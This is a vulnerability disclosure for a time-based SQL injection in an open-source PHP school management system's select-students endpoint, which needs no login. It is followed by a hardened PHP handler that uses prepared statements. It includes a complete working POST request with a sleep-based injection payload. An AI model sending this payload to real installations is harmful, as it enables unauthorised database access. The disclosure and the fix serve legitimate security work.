Yingyi Lin, Shudong Li, Zihao Lin, GZHU
PHP School management system developed for schools or small institutes.
GitHub address: https://github.com/ProjectsAndPrograms/school-management-system
owner_panel/fetch-data/select-students.php, reachable from the front end, contains a time-based (delay) SQL injection vulnerability. This vulnerability allows attackers to manipulate the application's database through specially crafted SQL query strings. Because user input is insufficiently verified, attackers can insert malicious SQL code into input fields, thereby bypassing authentication, accessing or modifying sensitive data in the database, and even performing database management operations.
In the owner_panel/fetch-data/select-students.php file, there is no defense applied to the class input, and no login or session is required, so the SQL injection can be performed directly without a session:
POST /owner_panel/fetch-data/select-students.php HTTP/1.1
Host: www.cvehhh.eek
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0
Content-Type: application/x-www-form-urlencoded
Origin: http://www.cvehhh.eek
Accept-Encoding: gzip, deflate
Referer: http://www.cvehhh.eek/owner_panel/notices.php
Content-Length: 37

select=1' or sleep(1);#
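
A hardened handler for an endpoint like this one, as an added example that is not the project's own code: it rejects requests that carry no session and binds the `select` value as a query parameter instead of concatenating it. The session key `uid`, the `students` table and its columns, the allowed class format, and the connection settings are assumptions, since the page does not show the file's source.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Names marked "assumed" are hypothetical.
session_start();
header('Content-Type: application/json');

// 1. Refuse unauthenticated callers before touching the database.
//    The report notes the endpoint answers without any session.
if (empty($_SESSION['uid'])) {                 // 'uid' is an assumed session key
    http_response_code(401);
    exit(json_encode(['error' => 'login required']));
}

// 2. Validate the class selector against a strict allow-list pattern
//    (assumed format: short alphanumeric identifier).
$class = $_POST['select'] ?? '';
if (!is_string($class) || !preg_match('/\A[A-Za-z0-9_-]{1,16}\z/', $class)) {
    http_response_code(400);
    exit(json_encode(['error' => 'invalid class']));
}

// Assumed vulnerable pattern, shown only for contrast (string concatenation):
//   $sql = "SELECT ... FROM students WHERE class = '" . $_POST['select'] . "'";

// 3. Bind the value as a parameter so it is never parsed as SQL.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$conn = new mysqli('localhost', 'app_user', 'app_password', 'school'); // placeholder settings
$conn->set_charset('utf8mb4');

$stmt = $conn->prepare(
    'SELECT id, fname, lname FROM students WHERE class = ?'  // assumed schema
);
$stmt->bind_param('s', $class);
$stmt->execute();
$rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);

echo json_encode($rows);
```

With the value bound as a parameter, a body such as the one in the request above is rejected by the format check, and even without that check it would be compared as a literal string rather than executed.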